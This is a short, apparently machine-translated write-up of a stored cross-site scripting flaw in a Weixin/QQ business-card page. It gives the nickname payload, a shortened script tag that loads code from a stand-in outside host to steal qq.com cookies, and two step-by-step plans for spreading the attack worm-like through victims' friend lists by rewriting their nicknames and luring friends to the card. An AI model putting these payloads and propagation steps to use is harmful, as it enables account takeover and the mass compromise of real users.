View user business cards
Url: http://weixin.qq.com/cgi-bin/showcard? T = weixin_card & muin = your QQ number & fuin = Your/your friend's QQ number # a logon prompt will be prompted when accessing the QQ client of a higher version. You can directly view the QQ access of a lower version.
You can also access
1. Normal page:
Change nickname to <script> alert (1) </script>
2. XSS page:
3. Construct the attack code:
32 characters, which can be achieved through custom short URL + simplified <script> </script> code;
For example: <script/src = // xx.cn/I/>
4. After xss code is constructed:
The obtained cookies can control any website (such as email, space, and account) in the user's qq.com domain)
In-depth exploitation of vulnerabilities:
Conjecture 1:
1. Obtain the current logon QQ number
2. automatically add QQ friends who construct xss pages
3. Access the xss page
4. Gain Control
Conjecture 2:
1. Obtain the current logon QQ number
2. automatically add QQ friends who construct xss pages
3. Access the xss page
4. Modify the nickname url by capturing the client (no interface for modifying nickname on the web), and change the nickname of the user to xss code.
5. Get a friend list
6. Construct the access url: http://weixin.qq.com/cgi-bin/showcard? T = weixin_card & muin = your QQ number & fuin = your friend's QQ number
7. Share this url with a specified friend or trick a friend into accessing your business card.
8. Obtain Control